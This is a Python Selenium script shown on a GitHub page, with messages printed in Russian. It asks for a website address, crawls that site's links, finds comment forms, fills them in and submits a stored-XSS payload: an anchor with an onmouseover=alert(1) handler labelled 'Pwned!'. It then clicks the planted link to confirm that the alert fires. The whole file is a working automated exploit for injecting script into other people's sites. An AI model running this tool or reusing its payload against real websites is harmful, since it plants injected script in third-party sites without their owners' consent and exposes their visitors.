-
Notifications
You must be signed in to change notification settings - Fork 0
/
XSS_in_commentbox.py
78 lines (74 loc) · 2.92 KB
/
XSS_in_commentbox.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from urllib.request import urlopen
from urllib.error import HTTPError
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
success = False
def Type_Expl():
Typed = False
try:
elem = driver.find_element_by_link_text("Pwned!")
elem.click()
WebDriverWait(driver, 3).until(EC.alert_is_present())
alert = driver.switch_to_alert()
print("XSS удался!")
return(True)
except (TimeoutException, NoSuchElementException):
try:
author = driver.find_element_by_name("author")
author.send_keys("Nagibator")
email = driver.find_element_by_name("email")
email.send_keys("Nagibator@gmail.com")
commentbox = driver.find_element_by_id("comment")
commentbox.send_keys("[a <a href=']'></a><a href=' onmouseover=alert(1) '>Pwned!</a>")
commentbox.submit()
Typed = True
elem = driver.find_element_by_link_text("Pwned!")
elem.click()
WebDriverWait(driver, 3).until(EC.alert_is_present())
alert = driver.switch_to_alert()
print("XSS удался!")
return(True)
except (NoSuchElementException, TimeoutException):
if Typed == True:
print("Эксплоит был применён, но, из-за модерации комментариев, нельзя проверить удачно, или нет")
return(False)
url = input("Введите адрес сайта\n")
print("Подождите")
driver = webdriver.Firefox()
driver.get(url)
list_links = driver.find_elements_by_tag_name("a")
list = []
for item in list_links:
if (item.get_attribute('href') not in list and item.get_attribute('href') != "http://wordpress.org/" and item.get_attribute('href') != "http://ru.wordpress.org/"):
list.append(item.get_attribute('href'))
for p in list:
driver.get(p)
success = Type_Expl()
if success == True:
break
try:
link = driver.find_element_by_partial_link_text("omment")
link.click()
success = Type_Expl()
if success == True:
break
except NoSuchElementException:
try:
link = driver.find_element_by_partial_link_text("оммента")
link.click()
success = Type_Expl()
if success == True:
break
except NoSuchElementException:
continue
if(success == False):
print("Инъекция не удалась")
driver.quit()
#assert "Python" in driver.title
#element = driver.find_element_by_id("comment")
#element.send_keys("[a <a href=']'></a><a href=' onmouseover=alert(1) '>Pwned!</a>")
#element.submit()
#driver.quit()